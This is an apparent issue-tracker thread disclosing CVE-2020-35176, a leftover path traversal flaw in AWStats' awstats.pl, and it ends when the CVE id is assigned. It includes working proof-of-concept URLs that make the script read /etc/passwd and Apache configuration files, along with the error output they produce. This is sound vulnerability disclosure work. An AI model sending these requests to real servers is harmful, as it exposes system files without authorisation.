CVE-2020-35176: path traversal flaw

[Beuc]

Hi,

It seems #90 is not completely fixed in 7.8.
(that is, even after CVE-2017-1000501 and CVE-2020-29600 are fixed)

Altering slightly the original example:
http://myserver.example.com/cgi-bin/awstats.pl?config=/etc/passwd
to e.g.:
http://myserver.example.com/cgi-bin/awstats.pl?config=passwd

Warning: Syntax error line 1 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc/passwd'. Config line is ignored.

http://myserver.example.com/cgi-bin/awstats.pl?config=/passwd

Warning: Syntax error line 1 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc//passwd'. Config line is ignored.

http://myserver.example.com/cgi-bin/awstats.pl?config=apache2/apache2.org

Warning: Syntax error line 80 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 87 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 92 in file '/etc/apache2/apache2.conf'. Config line is ignored.

it is still parsing /etc/*.

I'd expect it to only allow files within /etc/awstats/awstats*.conf.

Like #90 this requires that /etc/awstats/awstats.conf does not exist (e.g. in multi-hosting environments with no default config).

[carnil]

@Beuc: since the fix for #90 and identified with CVE-2020-29600 is in a released version, can you request a new CVE id for this (new) incomplete fix respectively for this remaining path traversal issue?

[Beuc]

@carnil: will do, leaving a couple days for the maintainer to confirm

[Beuc]

This is now CVE-2020-35176.